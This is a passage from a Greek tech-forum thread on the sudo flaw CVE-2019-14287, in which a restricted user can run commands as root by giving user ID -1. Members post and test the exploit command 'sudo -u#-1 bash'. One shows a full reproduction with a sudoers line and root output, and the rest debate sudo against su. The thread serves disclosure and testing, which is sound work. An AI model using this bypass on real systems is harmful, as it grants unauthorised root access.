Σελ. 1 από 2 12 ΤελευταίαΤελευταία
Εμφάνιση 1-15 από 25
  1. #1
    Εγγραφή
    22-09-2003
    Μηνύματα
    81.687
    Downloads
    218
    Uploads
    48
    Άρθρα
    6
    Τύπος
    VDSL2
    Ταχύτητα
    204800/20480
    ISP
    Wind
    Router
    Technicolor DGA4130
    SNR / Attn
    6(dB) / 2.8(dB)
    Path Level
    Interleaved
    Όλες οι εκδόσεις του Sudo πριν την 1.8.28, έχουν ευπάθεια στο security policy bypass, επιτρέποντας την εκτέλεση εντολών σαν root, ακόμα και αν ο λογαριασμός που χρησιμοποιείται απαγορεύει ρητά την root πρόσβαση.

    By default on most Linux distributions, the ALL keyword in RunAs specification in /etc/sudoers file, as shown in the screenshot, allows all users in the admin or sudo groups to run any command as any valid user on the system.

    However, since privilege separation is one of the fundamental security paradigms in Linux, administrators can configure a sudoers file to define which users can run what commands as to which users.

    So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and take complete control over the system.

    "This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification," the Sudo developers say.
    Η ευπάθεια με CVE-2019-14287, μπορεί να γίνει αντικείμενο εκμετάλλευσης, βάζοντας σαν userID το "-1" ή το "4294967295". Το utility που μετατρέπει το user ID σε username, χειρίζεται λανθασμένα αυτούς τους 2 αριθμούς σαν τον αριθμό 0 -με το user ID 0 να είναι πάντα ο χρήστης root.

    "Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run."
    Πατήστε στην εικόνα για να τη δείτε σε μεγέθυνση. 

Όνομα:  linux-sudo-hacking.png 
Εμφανίσεις:  471 
Μέγεθος:  12,2 KB 
ID: 207674


    Πηγή : The Hacker News

  2. #2
    Εγγραφή
    01-04-2006
    Περιοχή
    Cambridge, UK
    Μηνύματα
    1.403
    Downloads
    6
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    400 Mbps ⇋ 400 Mbps
    ISP
    Cambridge Fibre
    Router
    Linksys MR8300
    Σε Debian αναβαθμίστηκε εχθές.

  3. #3
    Εγγραφή
    17-03-2003
    Περιοχή
    Trondheim
    Μηνύματα
    2.986
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    Γρήγορη είναι
    ISP
    Telenor
    Μάλλον το δικό μου πατσαρίστηκε γρήγορα.

    Δοκιμάστε το:

    Κώδικας:
    # useradd guest
    # passwd guest
    # su guest
    
    $ sudo -u#-1 bash

  4. #4
    Εγγραφή
    02-04-2010
    Μηνύματα
    13.063
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Η τρύπα του αιώνα?
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  5. #5
    Εγγραφή
    10-02-2005
    Περιοχή
    Αθήνα
    Ηλικία
    56
    Μηνύματα
    491
    Downloads
    3
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    51200/5120
    ISP
    ΟΤΕ Conn-x
    DSLAM
    ΟΤΕ - ΑΓ. ΠΑΡΑΣΚΕΥΗ
    Router
    FritzBox 7590
    SNR / Attn
    27(dB) / 6(dB)
    Δεν ξέρω,
    άλλα ένα redhat 7.4 me sudo 1.8.19p2 δεν μου έδωσε access
    Κώδικας:
    [xxx@yyy ~]$ sudo -u#-1 bash
    [sudo] password for xxx:
    Sorry, user xxx is not allowed to execute '/bin/bash' as #-1 on yyy.
    [xxx@yyy ~]$ sudo -u\#-1 bash
    [sudo] password for xxx:
    Sorry, user xxxis not allowed to execute '/bin/bash' as #-1 on yyy.
    
    [xxx@yyy ~]$ sudo -V
    Sudo version 1.8.19p2
    Sudoers policy plugin version 1.8.19p2
    Sudoers file grammar version 45
    Sudoers I/O plugin version 1.8.19p2
    
    [xxx@yyy ~]$ cat /etc/redhat-release
    Red Hat Enterprise Linux Server release 7.4 (Maipo)
    Τελευταία επεξεργασία από το μέλος papako : 15-10-19 στις 11:28.

  6. #6
    Εγγραφή
    17-03-2003
    Περιοχή
    Trondheim
    Μηνύματα
    2.986
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    Γρήγορη είναι
    ISP
    Telenor
    Και σε εμένα ήταν η 1.8.27 τελικά αλλα δεν δούλευε.

  7. #7
    Εγγραφή
    02-04-2010
    Μηνύματα
    13.063
    Downloads
    0
    Uploads
    0
    ISP
    Forthnet
    Παράθεση Αρχικό μήνυμα από Eruyome(MMXGN) Εμφάνιση μηνυμάτων
    Μάλλον το δικό μου πατσαρίστηκε γρήγορα.

    Δοκιμάστε το:

    Κώδικας:
    # useradd guest
    # passwd guest
    # su guest
    
    $ sudo -u#-1 bash
    xxx:~# useradd guest
    xxx:~# passwd guest
    Enter new UNIX password:
    Retype new UNIX password:
    passwd: password updated successfully
    xxx:~# su guest
    $ sudo -u#-1 bash
    [sudo] password for guest:
    Sorry, user guest is not allowed to execute '/bin/bash' as #-1 on xxx.
    Εντάξει είμαι?

    Sudo version 1.8.21p2
    Όσο περισσότερο σου κλέβουν τη ζωή, τόσο σε ταΐζουν με έθνος και φυλή..

    Εθνικισμός και μετανάστες

    Μία τάξη, φυλετικά διαχωρισμένη

  8. #8
    Εγγραφή
    17-03-2003
    Περιοχή
    Trondheim
    Μηνύματα
    2.986
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    Γρήγορη είναι
    ISP
    Telenor
    Παράθεση Αρχικό μήνυμα από Zus Εμφάνιση μηνυμάτων
    Εντάξει είμαι?
    Ή κάτι κάνουμε λάθος ή χρειάζεται να κάνεις κάτι συγκεκριμένο στο /etc/sudoers που δεν αναφέρεται.

    Λεπτομέρεια είναι οτι έχω access sto %wheel και όχι στο %sudo. Δεν ξέρω αν έχει σημασία.

  9. #9
    Εγγραφή
    01-01-2008
    Περιοχή
    3rd Rock from the Sun
    Ηλικία
    48
    Μηνύματα
    546
    Downloads
    1
    Uploads
    0
    Τύπος
    VDSL2
    ISP
    Nova
    Path Level
    Fastpath
    Σε Arch με 1.8.27-1 δεν δούλεψε.

    Από ότι είδα στο αρχείο sudoers δεν είχα "ενεργό" το
    Κώδικας:
    %sudo	ALL=(ALL) ALL
    οπότε για αυτό τον λόγο δεν δούλεψε.
    Τελευταία επεξεργασία από το μέλος GigaSat : 15-10-19 στις 13:30.

  10. #10
    Εγγραφή
    17-03-2003
    Περιοχή
    Trondheim
    Μηνύματα
    2.986
    Downloads
    6
    Uploads
    0
    Ταχύτητα
    Γρήγορη είναι
    ISP
    Telenor
    Οκ δούλεψε σε fedora με 1.8.27

    Θέλει edit το sudoers

    Κώδικας:
    # visudo
    Κώδικας:
    # Προσθέστε αυτή τη γραμμή
    guest myhost=(ALL,!root) /usr/bin/id
    Μετά:

    Κώδικας:
    # as guest
    $ sudo id 
    
    Sorry, user guest is not allowed to execute '/usr/bin/id' as root on myhost.
    
    $ sudo -u#-1 id
    uid=0(root) gid=1001(guest)...
    Οπότε θέλει να έχεις πειράξει ήδη το sudoers και να χεις βάλει μέσα τον χρήστη/group/whatevs.
    Τελευταία επεξεργασία από το μέλος Eruyome(MMXGN) : 15-10-19 στις 13:44.

  11. #11
    Εγγραφή
    02-11-2003
    Περιοχή
    Επαναπατρισθείς στην Αθήνα
    Ηλικία
    49
    Μηνύματα
    56.427
    Downloads
    64
    Uploads
    73
    Τύπος
    VDSL2
    Ταχύτητα
    102400/10240
    ISP
    Vodafone
    Path Level
    Fastpath
    Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.

    Η σοβαρή εντολή ανέκαθεν ήταν η su -.
    Επιτέλους το ελάχιστο δυνατό, ευέλικτο, και ψηφιακό κράτος. Με διαρκή αξιολόγηση.

  12. #12
    Εγγραφή
    31-07-2010
    Περιοχή
    Θεσσαλονίκη
    Μηνύματα
    3.433
    Downloads
    1
    Uploads
    0
    Τύπος
    ADSL
    Ταχύτητα
    24576/1024
    ISP
    Nova
    Router
    TP-LINK Archer VR400
    SNR / Attn
    8.3(dB) / 6.2(dB)
    Παράθεση Αρχικό μήνυμα από WAntilles Εμφάνιση μηνυμάτων
    Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.

    Η σοβαρή εντολή ανέκαθεν ήταν η su -.
    Συμφωνώ, σε gentoo ποτέ δεν το χρειάστηκα, μέχρι πρότινος όμως που έπρεπε να εκτελώ scripts ως απλός χρήστης χωρίς να είμαι αναγκασμένος να έχω interaction για password. Αναγκαίο κακό επομένως, για κάποιες περιπτώσεις.

    Βέβαια έχω απομονώσει συγκεκριμένες εντολές που επιτρέπεται να εκτελεί ο απλός χρήστης, οπότε είναι κάπως καλύτερα απ'το default
    "%sudo ALL=(ALL) ALL".
    Dealing with pricks, is my speciality.

    Linux all the way.
    Open source all the way.
    Fighting against telemetry, data harvesting, tracking, ads all the way.

    For some people, ignorance is bliss.

  13. #13
    Εγγραφή
    14-11-2003
    Περιοχή
    At Milliways, the Restaurant at the End of the Universe
    Ηλικία
    44
    Μηνύματα
    3.048
    Downloads
    96
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    50000/5000
    ISP
    ΟΤΕ Conn-x
    Router
    OpenWRT (WNDR3700v2)
    Παράθεση Αρχικό μήνυμα από WAntilles Εμφάνιση μηνυμάτων
    Μία σαβούρα για άσχετους ουμπουντάδες ήταν ανέκαθεν το sudo.

    Η σοβαρή εντολή ανέκαθεν ήταν η su -.
    Ναι, για αυτό και έχουν sudo μέχρι και στο amazon linux. Τι να ξέρει και η αμαζον....
    Να φανταστώ και στα windows σου με τον admin κάνεις login?
    Τελευταία επεξεργασία από το μέλος xhaos : 15-10-19 στις 17:42.
    See first, think later, then test. But always see first. Otherwise you will only see what you were expecting. Most scientists forget that. - Douglas Adams
    There's no right, there's no wrong, there's only popular opinion. - Jeffrey Goines (12 Monkeys)


  14. #14
    Εγγραφή
    24-10-2004
    Μηνύματα
    15.637
    Downloads
    43
    Uploads
    0
    ISP
    V
    Παράθεση Αρχικό μήνυμα από xhaos Εμφάνιση μηνυμάτων
    Ναι, για αυτό και έχουν sudo μέχρι και στο amazon linux. Τι να ξέρει και η αμαζον....
    Να φανταστώ και στα windows σου με τον admin κάνεις login?
    καλά ότι το έχει και η amazon ή η κάθε amazon τι να λέει;
    Αυτοί ειδικά έχουν πρώτο μέλημα ένα "εύκολο" λειτουργικό, άρα χωρίς κωδικούς και βλακείες.

  15. #15
    Εγγραφή
    28-02-2006
    Μηνύματα
    1.150
    Downloads
    0
    Uploads
    0
    ISP
    Cosmote
    DSLAM
    ΟΤΕ - ΓΑΛΑΤΣΙ
    Παράθεση Αρχικό μήνυμα από Gentoo Εμφάνιση μηνυμάτων
    Συμφωνώ, σε gentoo ποτέ δεν το χρειάστηκα, μέχρι πρότινος όμως που έπρεπε να εκτελώ scripts ως απλός χρήστης χωρίς να είμαι αναγκασμένος να έχω interaction για password. Αναγκαίο κακό επομένως, για κάποιες περιπτώσεις.
    Βασικά αυτό.

    Και εγώ για interactive χρήση δεν το χρησιμοποιώ σχεδόν ποτέ, αλλά για αυτοματοποιημένη εκτέλεση scripts ως root, είναι σχεδόν μονόδρομος...
    NetBSD Rocks!
    http://www.netbsd.org

Σελ. 1 από 2 12 ΤελευταίαΤελευταία

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας